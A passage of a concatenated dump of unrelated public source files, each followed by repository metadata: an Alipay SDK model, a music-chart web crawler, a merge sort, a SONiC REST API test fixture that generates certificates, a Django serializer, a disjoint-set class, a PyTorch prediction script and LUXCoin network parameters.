params['trade_date'] = self.trade_date
if self.user_id:
if hasattr(self.user_id, 'to_alipay_dict'):
params['user_id'] = self.user_id.to_alipay_dict()
else:
params['user_id'] = self.user_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = InvoiceQueryOpenModel()
if 'apply_from' in d:
o.apply_from = d['apply_from']
if 'check_code' in d:
o.check_code = d['check_code']
if 'checker' in d:
o.checker = d['checker']
if 'clerk' in d:
o.clerk = d['clerk']
if 'einv_code' in d:
o.einv_code = d['einv_code']
if 'einv_no' in d:
o.einv_no = d['einv_no']
if 'ex_tax_amount' in d:
o.ex_tax_amount = d['ex_tax_amount']
if 'invoice_amount' in d:
o.invoice_amount = d['invoice_amount']
if 'invoice_content' in d:
o.invoice_content = d['invoice_content']
if 'invoice_date' in d:
o.invoice_date = d['invoice_date']
if 'invoice_id' in d:
o.invoice_id = d['invoice_id']
if 'invoice_kind' in d:
o.invoice_kind = d['invoice_kind']
if 'invoice_memo' in d:
o.invoice_memo = d['invoice_memo']
if 'invoice_title' in d:
o.invoice_title = d['invoice_title']
if 'invoice_type' in d:
o.invoice_type = d['invoice_type']
if 'm_short_name' in d:
o.m_short_name = d['m_short_name']
if 'ori_blue_inv_code' in d:
o.ori_blue_inv_code = d['ori_blue_inv_code']
if 'ori_blue_inv_no' in d:
o.ori_blue_inv_no = d['ori_blue_inv_no']
if 'out_apply_id' in d:
o.out_apply_id = d['out_apply_id']
if 'out_trade_no' in d:
o.out_trade_no = d['out_trade_no']
if 'payee' in d:
o.payee = d['payee']
if 'payee_address' in d:
o.payee_address = d['payee_address']
if 'payee_bank_account' in d:
o.payee_bank_account = d['payee_bank_account']
if 'payee_bank_name' in d:
o.payee_bank_name = d['payee_bank_name']
if 'payee_register_name' in d:
o.payee_register_name = d['payee_register_name']
if 'payee_register_no' in d:
o.payee_register_no = d['payee_register_no']
if 'payee_tel' in d:
o.payee_tel = d['payee_tel']
if 'preview_image_url' in d:
o.preview_image_url = d['preview_image_url']
if 'sub_m_short_name' in d:
o.sub_m_short_name = d['sub_m_short_name']
if 'sum_tax_amount' in d:
o.sum_tax_amount = d['sum_tax_amount']
if 'trade_date' in d:
o.trade_date = d['trade_date']
if 'user_id' in d:
o.user_id = d['user_id']
return o
| [
"liuqun.lq@alibaba-inc.com"
] | liuqun.lq@alibaba-inc.com |
c3538eb3371b01aba72df474025a27cb07554102 | bb160d2fc2c6182c4ca56c8e4635a14215f8c70f | /test_module/collector_test.py | d89697bcb6a78e55d06285541f3c33103c1160c4 | [] | no_license | bitacademy-howl/Music_Recommendation_mod | 9464ed941ff722123457ba18cf35bccee3640b9b | 94a430df1c65dc4b930f46ade4576bff95b6c27e | refs/heads/master | 2020-03-27T15:18:21.725593 | 2018-11-05T08:55:45 | 2018-11-05T08:55:45 | 146,709,303 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,630 | py | import datetime
import time
from bs4 import BeautifulSoup
import modules.collection.crawler as cw
from db_accessing import *
from db_accessing.VO import Music_VO, Artist_VO, Album_VO
from modules.collection.urlMaker import UrlMaker
class Collector:
def crawling_mnet_month_chart(url):
# crawling_from_chart
# mnet monthly chart 로부터 음원 데이터를 긁어오는 과정...
# VO 객체들
artistVO = Artist_VO()
albumVO = Album_VO()
musicVO = Music_VO()
html = cw.crawling(url=url)
bs = BeautifulSoup(html, 'html.parser')
#####################################################################################################################
# VO 값 입력
tag_music_list = bs.find('div', attrs={'class': 'MMLTable jQMMLTable'})
tag_tbody = tag_music_list.find('tbody')
tags_tr = tag_tbody.findAll('tr')
print("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
for tag_tr in tags_tr:
# item_title 태그내 정보들...
item_title_tag_td = tag_tr.find('td', attrs={'class': 'MMLItemTitle'})
# 8개 해야된다......
# 음원의 고유 아이디
musicVO.Music_ID = tag_tr.find('td', attrs={'class': 'MMLItemCheck'}).find('input')["value"]
musicVO.Music_Title = item_title_tag_td.find('a', attrs={'class': 'MMLI_Song'}).get_text()
album_tag = item_title_tag_td.find('a', attrs={'class': 'MMLIInfo_Album'})
artist_tag = item_title_tag_td.find('a', attrs={'class': 'MMLIInfo_Artist'})
print(album_tag)
print(artist_tag)
if album_tag != None:
albumVO.Album_Title = album_tag.get_text()
albumVO.Album_Node = album_tag["href"].strip(" ")
albumVO.Album_ID = int(albumVO.Album_Node.rsplit('/', 1)[1])
musicVO.Album_ID = albumVO.Album_ID
if artist_tag != None:
artistVO.Artist_Name = artist_tag.get_text()
# 객체 및 테이블에 노드 추가 할 것!
artistVO.Artist_Node = artist_tag["href"].strip(" ")
artistVO.Artist_ID = int(artistVO.Artist_Node.rsplit('/', 1)[1])
albumVO.Singer_ID = artistVO.Artist_ID
# #######commit 계속 안하고 한방에 못하는지 알아보고, ORM 객체 내 객체 포함...으로 알아볼 것!!!
# 양방향 머시기 하는듯...
db_session.merge(artistVO)
db_session.commit()
db_session.merge(albumVO)
db_session.commit()
db_session.merge(musicVO)
db_session.commit()
def crawling_track(url):
# 값을 입력할 VO 객체 생성
musicVO = Music_VO()
albumVO = Album_VO()
artistVO = Artist_VO()
# Music_ID 는 링크로부터 채워서 올것!
# Music_VO.Music_ID =
# bs from html response....
html = cw.crawling(url=url)
bs = BeautifulSoup(html, 'html.parser')
tag_music_info = bs.find('div', attrs={'class': 'music_info_view'})
# 곡 소개 테이블
summary = tag_music_info.find('div', attrs={'class': 'music_info_cont'})
album_tag = summary.find('tbody').find('a')
if album_tag is not None:
albumVO.Album_Node = album_tag['href'].strip(" ")
albumVO.Album_ID = albumVO.Album_Node.rsplit('/', 1)[1]
musicVO.Album_ID = albumVO.Album_ID
artist_tag = bs.find('span', attrs={'class': 'artist_txt'}).find('a')
if artist_tag != None:
artistVO.Artist_Node = artist_tag['href'].strip(" ")
artistVO.Artist_ID = artistVO.Artist_Node.rsplit('/', 1)[1]
artistVO.Artist_Name = artist_tag.get_text()
albumVO.Singer_ID = artistVO.Artist_ID
attrs = summary.find('li', attrs={'class': 'left_con'}).findAll('p', attrs={'class' : 'right'})
def crawling_artist(id):
artistVO = Artist_VO()
artistVO.Artist_ID = id
artistVO.Artist_Node = '/artist/{0}'.format(id)
artistVO.Group = False
url = ''.join(['http://www.mnet.com', artistVO.Artist_Node])
html = cw.crawling(url)
bs = BeautifulSoup(html, 'html.parser')
tag_artist_info = bs.find('div', attrs={'class': 'artist_info'})
if tag_artist_info is not None:
singer = tag_artist_info.find('a', attrs={'class': 'song_name'})
if singer is not None:
artistVO.Artist_Name = singer.get_text()
else:
artistVO.Artist_Name = tag_artist_info.find('li', attrs={'class': 'top_left'}).find(
'p').get_text().strip()
print("############# strip 결과 #############\n", artistVO.Artist_Name,
"\n############# strip 결과 #############\n")
a = tag_artist_info.find('div', attrs={'class': 'a_info_cont'})
tags = tag_artist_info.findAll('span', attrs={'class': 'right'})
for tag in tags:
if tag is not None:
text_list = tag.get_text().strip().replace(' ', '').replace('\r', '').replace('\n', '').replace(
'\t', '').replace('\xa0', '').split('|')
print(text_list)
for text in text_list:
if text == '남성' or text == '여성' or text == '혼성':
artistVO.Gender = text
if text == '그룹':
artistVO.Group = True
db_session.merge(artistVO)
db_session.commit()
time.sleep(0.5) # sleep 안주면 200 번째 request 이후 차단됨...
# 방화벽 or IPS
# 메인에서 호출할 함수들.....
def collecting_artist(self):
for id in range(1, 3000000, 1):
self.crawling_artist(id)
def collecting_track(self, node):
um = UrlMaker()
row_num_table = Music_VO.qurey.count()
for offs in range(0, row_num_table, 10):
result = Music_VO.query.limit(10).offset(offs).all()
for i in result:
self.crawling_track(um.direct_node_connect(i.Music_Node))
def collecting_chart(self):
um = UrlMaker()
for year in range(self.start_date.year, self.end_date.year+1):
for month in range(self.start_date.month, self.end_date.month+1):
try:
um.setDate(datetime.date(year, month, day=1))
um.url_maker_DATE_based()
for page_number in range(1, 3):
url = "".join([um.url_maker_DATE_based(), '?pNum=%d' % page_number])
print(url)
Collector.crawling_mnet_month_chart(url)
except ValueError:
break
# def __init__(self, start_date=datetime.date(2009, 1, 1), end_date=datetime.datetime.now().date()):
# # def __init__(self, start_date = datetime.date(2009, 1, 1), end_date = datetime.datetime.now().date()):
# self.start_date = start_date
# self.end_date = end_date
def __init__(self):
self.set_start_date()
self.end_date = datetime.datetime.now().date()
def set_start_date(self, year = 2009, month = 8, day = 1):
self.start_date = datetime.date(2009, 8, 1)
def set_end_date(self, year, month, day):
self.end_date = datetime.date(year, month, day) | [
"howl1118@gmail.com"
] | howl1118@gmail.com |
0ed61bd167a35b1334d7c438c545bdb341018a46 | faef451f80e68a256af92dcc0d63feb86dedcf08 | /algorithms/sorting/merge-sort.py | 42480c48c75d0cc2ef199b4d8d852494e5242f47 | [] | no_license | shakilxyz/python | b36a06fd7b470c02848310e06fd704664e95e37e | 98c4ebf8273b2962f9ad22effed842e1b15b09d8 | refs/heads/main | 2023-06-03T05:01:08.370830 | 2021-06-21T15:21:10 | 2021-06-21T15:21:10 | 256,231,882 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,217 | py | """
Merge sort is created based on divide and conquer rule
It takes less time than many other sorting algorithms
Practically it takes about 0.22 seconds of time shorting about 20000 elements
Average time complexity of merge sort is O(nlog n)
In this code I have divide the main array into to sub arrays a,b
then again merged a into two and b into two and again ... until the length of array becomes 1
after the i have merged arrays reversely by sorting small arrays between them
i have declared left and right. left means the left sub array after dividing the main array and right is right
left -> a
right -> b
"""
def merge(a, b):
i, j, c = 0, 0, []
while i < len(a) and j < len(b):
if a[i] < b[j]:
c.append(a[i])
i += 1
else:
c.append(b[j])
j += 1
if i == len(a):
c.extend(b[j:])
if j == len(b):
c.extend(a[i:])
return c
def mergeSort(array):
if len(array) <= 1:
return array
left, right = mergeSort(array[:len(array) // 2]), mergeSort(array[len(array) // 2:])
return merge(left, right)
print(mergeSort([10, 3, 18, 4, 32, 19, 27, 0, 3]))
| [
"noreply@github.com"
] | shakilxyz.noreply@github.com |
62ccef834d24c047c8d8308cd15dcbfcacd02062 | 49663ea34b41c8180d7484f778f5cad2e701d220 | /tests/restapi/conftest.py | 8915e5344b0b69e02c6d33ddb2f2045958be013b | [
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] | permissive | stepanblyschak/sonic-mgmt | ed08c98e7bff1615b057daa8711686aa5986073d | a1ae1e0b4e9927e6f52916f76121780d19ec3e54 | refs/heads/master | 2023-04-07T01:30:11.403900 | 2023-03-29T10:16:52 | 2023-03-29T10:16:52 | 135,678,178 | 0 | 0 | NOASSERTION | 2023-03-29T16:13:55 | 2018-06-01T06:41:49 | Python | UTF-8 | Python | false | false | 4,694 | py | import logging
import pytest
import urllib3
from six.moves.urllib.parse import urlunparse
from tests.common import config_reload
from tests.common.helpers.assertions import pytest_require as pyrequire
from tests.common.helpers.dut_utils import check_container_state
from helper import apply_cert_config
RESTAPI_CONTAINER_NAME = 'restapi'
@pytest.fixture(scope="module", autouse=True)
def setup_restapi_server(duthosts, rand_one_dut_hostname, localhost):
'''
Create RESTAPI client certificates and copy the subject names to the config DB
'''
duthost = duthosts[rand_one_dut_hostname]
# Check if RESTAPI is enabled on the device
pyrequire(check_container_state(duthost, RESTAPI_CONTAINER_NAME, should_be_running=True),
"Test was not supported on devices which do not support RESTAPI!")
# Create Root key
local_command = "openssl genrsa -out restapiCA.key 2048"
localhost.shell(local_command)
# Create Root cert
local_command = "openssl req \
-x509 \
-new \
-nodes \
-key restapiCA.key \
-sha256 \
-days 1825 \
-subj '/CN=test.restapi.sonic' \
-out restapiCA.pem"
localhost.shell(local_command)
# Create server key
local_command = "openssl genrsa -out restapiserver.key 2048"
localhost.shell(local_command)
# Create server CSR
local_command = "openssl req \
-new \
-key restapiserver.key \
-subj '/CN=test.server.restapi.sonic' \
-out restapiserver.csr"
localhost.shell(local_command)
# Sign server certificate
local_command = "openssl x509 \
-req \
-in restapiserver.csr \
-CA restapiCA.pem \
-CAkey restapiCA.key \
-CAcreateserial \
-out restapiserver.crt \
-days 825 \
-sha256"
localhost.shell(local_command)
# Create client key
local_command = "openssl genrsa -out restapiclient.key 2048"
localhost.shell(local_command)
# Create client CSR
local_command = "openssl req \
-new \
-key restapiclient.key \
-subj '/CN=test.client.restapi.sonic' \
-out restapiclient.csr"
localhost.shell(local_command)
# Sign client certificate
local_command = "openssl x509 \
-req \
-in restapiclient.csr \
-CA restapiCA.pem \
-CAkey restapiCA.key \
-CAcreateserial \
-out restapiclient.crt \
-days 825 \
-sha256"
localhost.shell(local_command)
# Copy CA certificate and server certificate over to the DUT
duthost.copy(src='restapiCA.pem', dest='/etc/sonic/credentials/')
duthost.copy(src='restapiserver.crt', dest='/etc/sonic/credentials/testrestapiserver.crt')
duthost.copy(src='restapiserver.key', dest='/etc/sonic/credentials/testrestapiserver.key')
apply_cert_config(duthost)
urllib3.disable_warnings()
yield
# Perform a config load_minigraph to ensure config_db is not corrupted
config_reload(duthost, config_source='minigraph')
# Delete all created certs
local_command = "rm \
restapiCA.* \
restapiserver.* \
restapiclient.*"
localhost.shell(local_command)
@pytest.fixture
def construct_url(duthosts, rand_one_dut_hostname):
def get_endpoint(path):
duthost = duthosts[rand_one_dut_hostname]
RESTAPI_PORT = "8081"
netloc = duthost.mgmt_ip+":"+RESTAPI_PORT
try:
tup = ('https', netloc, path, '', '', '')
endpoint = urlunparse(tup)
except Exception:
logging.error("Invalid URL: "+endpoint)
return None
return endpoint
return get_endpoint
@pytest.fixture
def vlan_members(duthosts, rand_one_dut_hostname, tbinfo):
duthost = duthosts[rand_one_dut_hostname]
VLAN_INDEX = 0
mg_facts = duthost.get_extended_minigraph_facts(tbinfo)
if mg_facts["minigraph_vlans"] != {}:
vlan_interfaces = list(mg_facts["minigraph_vlans"].values())[VLAN_INDEX]["members"]
if vlan_interfaces is not None:
return vlan_interfaces
return []
| [
"noreply@github.com"
] | stepanblyschak.noreply@github.com |
91448e8bbbe643023d4f64b1ed66f70b256c713e | 2d3133a877056d36053adfe6ff5b6642eb74f757 | /Movies/serailizer.py | 13998b81d48ecd7a8ff420a5d0a98691432f6b75 | [] | no_license | nirbhaykr/Movies-listing- | 91db3257188afc41440650a29a5d3cbeb554160d | 6b976dd0925b2582a2edc476311e90b2cbe7d0c1 | refs/heads/master | 2021-01-21T13:40:25.106226 | 2016-05-25T11:36:06 | 2016-05-25T11:36:06 | 45,236,998 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,066 | py | from rest_framework import serializers
from Movies.models import Movies, Genre
class GenreSerializer(serializers.ModelSerializer):
"""
Purpose: A serializer that deals with Details instances and
querysets.
"""
class Meta(object):
model = Genre
# fields = ('category',)
# read_only_fields = ('entries',)
# exclude = ('broken_url_flag',)
class MovieSerializer(serializers.ModelSerializer):
genre = GenreSerializer(many=True,
required=False, read_only=False)
genre = serializers.SlugRelatedField(many=True, queryset = Genre.objects.all(), read_only=False, slug_field='category')
def create(self, validated_data):
if validated_data.get('genre'):
cateogry_list = validated_data.pop('genre')
mov_obj = Movies.objects.create(**validated_data)
mov_obj.genre.add(*cateogry_list)
return mov_obj
class Meta(object):
model = Movies
fields = ('id','name', 'director', 'popularity', 'imdb_score','genre')
| [
"kumar.nirbhay101@gmail.com"
] | kumar.nirbhay101@gmail.com |
6d5d9a2877f278f352cb823a3104ae00dfb625cb | a7a5e113e429d481ab37662a1f108c850658d8fc | /shortener/migrations/0002_auto_20170621_1848.py | 80c2615c028047e29433bcbec079f6135b82b1cd | [
"Apache-2.0"
] | permissive | Showndarya/WebPanel | e16f3603257a7de0a1289e8a955dfcab6056d81a | 3140889303f72bfddc4af3df9a21a118ec7b8e38 | refs/heads/master | 2020-12-02T16:13:05.990827 | 2017-07-07T08:50:45 | 2017-07-07T08:50:45 | 96,520,639 | 1 | 1 | null | 2017-07-07T09:05:35 | 2017-07-07T09:05:35 | null | UTF-8 | Python | false | false | 424 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-06-21 18:48
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('shortener', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='urls',
old_name='time_stamp',
new_name='timeStamp',
),
]
| [
"Chaitya62@gmail.com"
] | Chaitya62@gmail.com |
4397ea80fcea25905d167fecc3a88d6f60145601 | f3a522b7df742610b81955f4428a7a03ca1b581c | /twss.py | 7ab0767e189942ee5a70a1ac416f0b29e4365304 | [] | no_license | suharshs/TWSS | 44f637a91fde4c9cdb29f15a49f9b237228ce77c | 05374f030f21194c1b040c28887c5bc3b4b1a1bd | refs/heads/master | 2016-09-05T08:53:10.944262 | 2012-08-15T19:11:36 | 2012-08-15T19:11:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 396 | py | """
The command line tool for inputting files to the classifier.
Author : Suharsh Sivakumar
Date : July 1, 2012
"""
import sys
from naive_bayes import *
if len(sys.argv) == 1:
print 'You must input a file that you want to test!'
exit()
twss_list = []
for i in range(1, len(sys.argv)):
twss_list = twss_list + NaiveBayesClassifier().CheckFile(sys.argv[i])
for twss in twss_list:
print twss | [
"suharshs@gmail.com"
] | suharshs@gmail.com |
630c7e4383ae9789db46283c4677496ec7de593b | fb4e0f6141c08f9a57027c156e7752d77de88ae8 | /disjointset.py | f42e55d64f5777344de84a4e8c7b02bd0afed713 | [] | no_license | divyamsm/Algorithms-lab | a662acd15c4091d35b95faafb41690e8abf954cf | d003748503f5b38b234d122335da07fe038ff43c | refs/heads/master | 2020-03-13T05:33:30.615221 | 2018-04-25T10:00:50 | 2018-04-25T10:00:50 | 130,986,610 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,213 | py | class SetNode:
def __init__(self,id = None):
self.id = id
self.parent = None
self.rank = 0
def makeset(id,DSL):
x = SetNode(id)
x.parent = x
DSL.addset(x)
return x
def findset(x):
t = x
if t.parent != t: #while t.parent ! = t:
t.parent = findset(t.parent) # t = t.parent
return t.parent # return t
def union(x,y,DSL):
t1 = findset(y)
t2 = findset(x)
if t1.rank > t2.rank:
t2.parent = t1
t1.id += t2.id
DSL.delete(t2)
elif t2.rank > t1.rank:
t1.parent = t2
t2.id += t1.id
DSL.delete(t1)
else :
t1.parent = t2
t2.id += t1.id
t2.rank +=1
DSL.delete(t1)
class DisjointSetList:
def __init__(self):
self.setlist = []
def delete(self,x):
self.setlist.remove(x)
def addset(self,x):
self.setlist.append(x)
def printsets(self):
for i in self.setlist:
print(i.id)
DSL = DisjointSetList()
a = makeset('a',DSL)
b = makeset('b',DSL)
c = makeset('c',DSL)
d = makeset('d',DSL)
e = makeset('e',DSL)
union(c,d,DSL)
union(c,b,DSL)
DSL.printsets()
| [
"divyammehta@Divyams-MacBook-Pro.local"
] | divyammehta@Divyams-MacBook-Pro.local |
bca4819ea217f20d23ec2024b4071fb1f152036f | 3aefdc5d371bc621984fb843cce7edf121466c0d | /generate_predict.py | 1c3ea8ec8c81cb4642e4965366be1e81beb6a216 | [] | no_license | viet98lx/MC_net | 2edec56ff87914565d800c2d0eea62b95c0154c3 | ee4110b9e8bcacf4abd0301b5e501bc0d2412d4b | refs/heads/master | 2023-03-25T14:01:16.402493 | 2021-03-22T15:13:33 | 2021-03-22T15:13:33 | 347,430,603 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,408 | py | import os
import torch
import utils
import argparse
import check_point
import model
import scipy.sparse as sp
import data_utils
def generate_predict(model, data_loader, result_file, reversed_item_dict, number_predict, batch_size):
device = model.device
nb_test_batch = len(data_loader.dataset) // batch_size
if len(data_loader.dataset) % model.batch_size == 0:
total_batch = nb_test_batch
else :
total_batch = nb_test_batch + 1
print("Total Batch in data set %d" % total_batch)
model.eval()
with open(result_file, 'w') as f:
# f.write('Predict result: ')
for i, data_pack in enumerate(data_loader,0):
data_x, data_seq_len, data_y = data_pack
x_ = data_x.to(dtype = model.d_type, device = device)
real_batch_size = x_.size()[0]
y_ = data_y.to(dtype = model.d_type, device = device)
predict_ = model(x_)
sigmoid_pred = torch.sigmoid(predict_)
topk_result = sigmoid_pred.topk(dim=-1, k= number_predict, sorted=True)
indices = topk_result.indices
# print(indices)
values = topk_result.values
for row in range(0, indices.size()[0]):
f.write('ground_truth | ')
ground_truth = y_[row].nonzero().squeeze(dim=-1)
for idx_key in range(0, ground_truth.size()[0]):
f.write(str(reversed_item_dict[ground_truth[idx_key].item()]) + " ")
f.write('\n')
f.write('predicted_items ')
for col in range(0, indices.size()[1]):
f.write('| ' + str(reversed_item_dict[indices[row][col].item()]) + ':%.8f' % (values[row][col].item()) + ' ')
f.write('\n')
parser = argparse.ArgumentParser(description='Generate predict')
parser.add_argument('--ckpt_dir', type=str, help='folder contains check point', required=True)
parser.add_argument('--model_name', type=str, help='name of model', required=True)
# parser.add_argument('--epoch', type=int, help='last epoch before interrupt', required=True)
parser.add_argument('--data_dir', type=str, help='folder contains data', required=True)
# parser.add_argument('--nb_hop', type=int, help='level of correlation matrix', default=1)
parser.add_argument('--batch_size', type=int, help='batch size predict', default=8)
parser.add_argument('--nb_predict', type=int, help='number items predicted', default=30)
# parser.add_argument('--log_result_dir', type=str, help='folder to save result', required=True)
args = parser.parse_args()
prefix_model_ckpt = args.model_name
ckpt_dir = args.ckpt_dir
data_dir = args.data_dir
# real_adj_matrix = sp.load_npz(data_dir + 'adj_matrix/r_matrix_'+ str(args.nb_hop) + 'w.npz')
train_data_path = data_dir + 'train_lines.txt'
train_instances = utils.read_instances_lines_from_file(train_data_path)
nb_train = len(train_instances)
print(nb_train)
validate_data_path = data_dir + 'validate_lines.txt'
validate_instances = utils.read_instances_lines_from_file(validate_data_path)
nb_validate = len(validate_instances)
print(nb_validate)
test_data_path = data_dir + 'test_lines.txt'
test_instances = utils.read_instances_lines_from_file(test_data_path)
nb_test = len(test_instances)
print(nb_test)
### build knowledge ###
print("@Build knowledge")
MAX_SEQ_LENGTH, item_dict, reversed_item_dict, item_probs = utils.build_knowledge(train_instances, validate_instances, test_instances)
print("first item in dict ", reversed_item_dict[0])
print("#Statistic")
NB_ITEMS = len(item_dict)
print(" + Maximum sequence length: ", MAX_SEQ_LENGTH)
print(" + Total items: ", NB_ITEMS)
batch_size = args.batch_size
# train_loader = data_utils.generate_data_loader(train_instances, load_param['batch_size'], item_dict, MAX_SEQ_LENGTH, is_bseq=True, is_shuffle=True)
# valid_loader = data_utils.generate_data_loader(validate_instances, load_param['batch_size'], item_dict, MAX_SEQ_LENGTH, is_bseq=True, is_shuffle=False)
test_loader = data_utils.generate_data_loader(test_instances, batch_size, item_dict, MAX_SEQ_LENGTH, is_bseq=True, is_shuffle=True)
load_model = torch.load(ckpt_dir+'/'+prefix_model_ckpt+'.pt')
nb_predict = args.nb_predict
result_file = ckpt_dir+'/'+prefix_model_ckpt+'_predict_top_' + str(nb_predict) + '.txt'
generate_predict(load_model, test_loader, result_file, reversed_item_dict, nb_predict, batch_size) | [
"vietuet98@gmail.com"
] | vietuet98@gmail.com |
45754b9e0e0186c805983ec25d5984a9ecdc1f4e | 3a99ffd8884cb3646b337a811ff0e92cbd67b67e | /testpkg/__init__.py | d7dfdd8f08a81fb05baa04d55f7322c18e491c5e | [
"MIT"
] | permissive | HurricanKai/PythonTest | c2a624d3588a54d603b21da01c10b872f7c3924c | d46c9367279c5e94d7d40e96db87d4016c5d4549 | refs/heads/master | 2022-04-24T14:13:55.655474 | 2020-04-27T12:45:09 | 2020-04-27T12:45:09 | 259,260,633 | 0 | 0 | MIT | 2020-04-27T14:00:40 | 2020-04-27T09:03:09 | Python | UTF-8 | Python | false | false | 76 | py | from version import get_version
__version__ = get_version(pep440=False)
| [
"kai.jellinghaus1@gmail.com"
] | kai.jellinghaus1@gmail.com |
82618b87083e10bfaae60418438d4b4484eff083 | 687b4f2d9cdbe8c72a743a2c329dcd907ad15e42 | /main.py | 9f1a2bfc6aa3a9bd36367f0fc35fb57f1314435c | [] | no_license | tokikk/rsc | 1a8cc4d7fa526ac9e8d8aa879e30d6f9f0175355 | 8ffeb40a21f51913da585488bdedb857002833ca | refs/heads/master | 2022-12-08T09:48:40.042927 | 2020-08-25T10:25:41 | 2020-08-25T10:25:41 | 290,171,909 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,557 | py | import PySimpleGUI as sg
sg.theme('')
size1 = [[sg.Radio('割合', "RADIO1", font=("Meiryo UI", 14), default=True)],
[
sg.Text(' '),
sg.InputText('100',
font=("Meiryo UI", 13),
size=(5, 1),
justification="right"),
sg.Text('%')
]]
size2 = [[sg.Radio('絶対値', "RADIO1", font=("Meiryo UI", 14))],
[
sg.Text(' '),
sg.InputText('100',
size=(5, 1),
font=("Meiryo UI", 13),
justification="right"),
sg.Text('px * '),
sg.InputText('100',
size=(5, 1),
font=("Meiryo UI", 13),
justification="right"),
sg.Text('px')
]]
size_frame = [[sg.Column(size1), sg.Text(' '), sg.Column(size2)]]
path_frame = [[
sg.InputText("",
key='PathField',
size=(33, 1),
text_color="black",
font=("Meiryo UI", 12),
disabled=True),
sg.FolderBrowse('参照', key='SavedPath')
]]
input_frame = [[
sg.Table([''],
key="Table",
headings=['ファイル'],
auto_size_columns=False,
def_col_width=5,
num_rows=10,
col_widths=[40],
display_row_numbers=False,
header_text_color='#0000ff',
header_background_color='#cccccc')
], [sg.FilesBrowse('参照', key='AddFile', size=(47,1))]]
layout = [[sg.Frame(
'変換サイズ',
size_frame,
font=("Meiryo UI", 12),
)], [sg.Frame(
'保存先',
path_frame,
font=("Meiryo UI", 12),
)],
[sg.Frame('変換対象', input_frame, font=("Meiryo UI", 12))],
[
sg.ProgressBar(100,
orientation='h',
size=(29, 20),
key='progressbar'),
sg.Button(button_text='変換開始')
]]
window = sg.Window('サンプルプログラム', layout)
while True:
event, values = window.read()
print(event, values)
if event == sg.WIN_CLOSED: #ウィンドウのXボタンを押したときの処理
break
if event == 'SavedPath':
values['PathField'] = values['SavedPath']
if event == 'AddFile':
window['Table'].update(values['Table'].append(values['AddFile']))
window.Finalize()
window.close
| [
"tokikake42@gmail.com"
] | tokikake42@gmail.com |
4d4847f47f6987bffcd9ee7fb182daf363927984 | 729532b780c42b6c1ee667bf567d306c634e977e | /activity_note/migrations/0002_auto_20200114_0220.py | 3043463a861c6e29dac8a51f61e25567e619d973 | [] | no_license | pkubiak/hearty-playground | e52dc9ed0e8f6f350f6c4bf2d26c736e8fea55a9 | 8fd81a0961e59b7fd4f385e151001171f9d6dd09 | refs/heads/master | 2022-04-08T10:23:59.685961 | 2020-02-07T16:38:42 | 2020-02-07T16:38:42 | 226,224,651 | 1 | 0 | null | 2020-03-02T17:33:35 | 2019-12-06T01:56:43 | Python | UTF-8 | Python | false | false | 334 | py | # Generated by Django 3.0 on 2020-01-14 02:20
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('activity_note', '0001_initial'),
]
operations = [
migrations.RenameModel(
old_name='NoteContent',
new_name='ActivityNote',
),
]
| [
"pawel.kubiak@protonmail.com"
] | pawel.kubiak@protonmail.com |
98e18716a9a40ce6f97772b337d0e7a52b7d9e22 | f07e56528bd10f93e6f9bb8b297e7e20ebd79e07 | /accounts/urls.py | b422e8ede9207237355a78c11628f7eb46f3d419 | [] | no_license | in-manish/miniwallet | 1ca1c4b3e0001ebc9d00895cb47b5ecfe26edc4a | 0fec75bf65308e6fe2cb7aae72471e47069bb041 | refs/heads/master | 2023-08-07T07:41:26.287578 | 2021-10-07T16:02:27 | 2021-10-07T16:02:27 | 414,030,746 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 260 | py | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^obtain-token$', view=views.ObtainTokenAPIView.as_view(), name='obtain token'),
url(r'^register$', view=views.RegisterCustomerAPIView.as_view(), name='Register customer'),
]
| [
"sonal@fairfest.in"
] | sonal@fairfest.in |
9f31ced0545add05ccb31c2e6eb3960ae27a55b2 | 7cad80770718e655766dd038bc654ebe1ad2ab3e | /network/luxcoin.py | 6576af28c49f3760dde6240c7cd0d0d732ec5e78 | [] | no_license | kindanew/clove_bounty | d0e1f917dff5b3a23eae6a05d6449af068fb4dc9 | e707eebde301ac3728a5835d10d927aa83d27ab5 | refs/heads/master | 2021-04-29T00:29:37.698092 | 2018-02-24T02:34:33 | 2018-02-24T02:34:33 | 121,830,043 | 0 | 0 | null | 2018-02-17T05:34:54 | 2018-02-17T05:26:51 | Python | UTF-8 | Python | false | false | 781 | py | from clove.network.bitcoin import Bitcoin
class LUXCoin(Bitcoin):
"""
Class with all the necessary LUX network information based on
https://github.com/216k155/lux/blob/master/src/chainparams.cpp
(date of access: 02/12/2018)
"""
name = 'luxcoin'
symbols = ('LUX', )
seeds = ('5.189.142.181', '5.77.44.147', '209.250.254.156', '45.76.114.209', 'luxseed1.luxcore.io', 'luxseed2.luxcore.io', 'luxseed3.luxcore.io', 'luxseed4.luxcore.io')
port = 26868
class LUXCoinTestNet(LUXCoin):
"""
Class with all the necessary LUX testing network information based on
https://github.com/216k155/lux/blob/master/src/chainparams.cpp
(date of access: 02/12/2018)
"""
name = 'test-luxcoin'
seeds = ('88.198.192.110')
port = 28333 | [
"egorsego@git.training"
] | egorsego@git.training |
